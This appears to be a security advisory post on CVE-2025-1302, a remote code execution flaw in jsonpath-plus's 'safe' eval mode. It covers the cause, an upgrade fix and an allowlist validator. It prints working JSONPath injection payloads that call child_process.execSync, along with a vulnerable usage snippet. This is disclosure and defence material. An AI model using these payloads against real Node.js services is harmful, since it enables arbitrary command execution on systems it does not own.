CVE-2025-1302 is a newly disclosed vulnerability affecting the popular JavaScript library jsonpath-plus. It allows attackers to execute arbitrary code on any system running a vulnerable version of the library. This happens due to unsafe handling of user input in eval='safe' mode, which fails to properly sanitize strings before evaluating them.

> Versions Affected:
> jsonpath-plus versions before 10.3.

Attackers can exploit this issue for Remote Code Execution (RCE). If you use jsonpath-plus in your app—especially with user-supplied input or untrusted data—you are at risk.

Why Did This Happen?

This vulnerability is an incomplete fix for CVE-2024-21534. While the original CVE attempted to patch up unsafe code paths using the eval='safe' option, researchers found that the fix wasn’t enough. Attackers could still sneak malicious code past the filters due to gaps in sanitization logic.

How Does the Attack Work?

The problem is rooted in how jsonpath-plus processes expressions provided in JSONPath queries. When using the eval='safe' mode, it's expected that user-provided values inside expressions would be isolated. However, unsafe defaults and poor validation allow input like:

$.store.book[?(@.price < 10 || (process.mainModule.require('child_process').execSync('touch x')))]

Because the embedded JavaScript is insufficiently filtered, this code would run inside your Node.js process—allowing attackers to run any shell command they want!

Vulnerable Code

const { JSONPath } = require('jsonpath-plus');

const inputQuery = "$..book[?(@.author.match(/John Doe/) || eval('require(\"child_process\").execSync(\"touch /tmp/hacked\")'))]";
const data = {
  "book": [
    { "author": "John Doe", "price": 15 },
    { "author": "Jane Roe", "price": 8 }
  ]
};

// BAD: Directly passing inputQuery from the user!
const result = JSONPath({ path: inputQuery, json: data, eval: 'safe' });

console.log(result);

What Happens

An attacker could submit a malicious JSONPath query that executes any shell command, such as writing to a file or even starting a reverse shell.

How to Fix (Mitigation)

Upgrade Immediately

Upgrade jsonpath-plus to version 10.3 or later, where this vulnerability is fully patched.

npm install jsonpath-plus@^10.3

NEVER accept untrusted user input directly as a JSONPath expression—if you must, sanitize it *yourself* or use a strict whitelist approach.
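As an added example (not code from jsonpath-plus or from this post), one way to implement that allowlist in JavaScript: a validator that accepts only plain path segments and refuses any filter or script expression before the string is ever handed to JSONPath(), plus a named-query map so the client never supplies a raw path at all. The grammar, the query names and the request shape are assumptions made for this example.

```javascript
// Added example, not part of jsonpath-plus. The grammar below is a deliberately
// narrow subset of JSONPath: "$" followed by zero or more segments, where a segment is
//   .name  ..name  .*  ..*          (dot child / recursive descent)
//   [n]  [n,n,...]  [*]  ['name']   (index, union, wildcard, quoted key)
// Filter "[?( ... )]" and script "[( ... )]" expressions never match, because those
// are the constructs jsonpath-plus evaluates as JavaScript (the CVE-2025-1302 path).
const SAFE_JSONPATH = /^\$(?:\.\.?(?:\*|[A-Za-z_][A-Za-z0-9_]*)|\[(?:\*|\d+(?:,\d+)*|'[^'\\\[\]]*')\])*$/;

const MAX_QUERY_LENGTH = 256; // assumed limit; keeps pathological inputs out of the regex

function isSafeJsonPath(query) {
  if (typeof query !== 'string' || query.length === 0 || query.length > MAX_QUERY_LENGTH) {
    return false;
  }
  // Belt and braces: no parentheses at all, so no filter or script expression can
  // slip through a gap in the regex above.
  if (query.includes('(') || query.includes(')')) {
    return false;
  }
  return SAFE_JSONPATH.test(query);
}

// Safer still: the client picks a query by name and the JSONPath strings stay
// server-side. Names and paths here are constructed for the example.
const NAMED_QUERIES = Object.freeze({
  allAuthors: '$..book[*].author',
  allPrices: '$.store.book[*].price',
});

// request is an assumed shape: { name?: string, path?: string }.
// Returns the JSONPath string to run, or null if the request must be refused.
function resolveUserQuery(request) {
  if (request.name !== undefined) {
    // hasOwnProperty via the prototype so "__proto__" or "constructor" cannot resolve
    return Object.prototype.hasOwnProperty.call(NAMED_QUERIES, request.name)
      ? NAMED_QUERIES[request.name]
      : null;
  }
  return isSafeJsonPath(request.path) ? request.path : null;
}

// Constructed inputs: a plain path passes, the filter expression from the advisory is refused.
const filterQuery = "$..book[?(@.author.match(/John Doe/) || eval('require(\"child_process\").execSync(\"touch /tmp/hacked\")'))]";
console.log(isSafeJsonPath('$..book[*].author'), isSafeJsonPath(filterQuery)); // true false
```

Only a query that passes isSafeJsonPath() or comes out of NAMED_QUERIES should be passed as the path option to JSONPath(); everything else is rejected before the library sees it.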

> Pro Tip:
> Restrict access to sensitive functions and always run Node.js apps using the least privilege possible.

References & Additional Reading

- Official Advisory from jsonpath-plus
- NPM security advisory
- Snyk Vulnerability Report for CVE-2024-21534
- CVE Record for CVE-2025-1302 *(pending update)*
- jsonpath-plus GitHub

Final Thoughts

If you’re using jsonpath-plus below version 10.3, update right away. Even in “safe” eval mode, your server can be tricked into running arbitrary shell commands. Double-check your dependency tree and audit any other packages that might bring in older versions.

Stay secure—patch fast, review your exposure, and keep up with advisories!


Timeline

Published on: 02/15/2025 05:15:11 UTC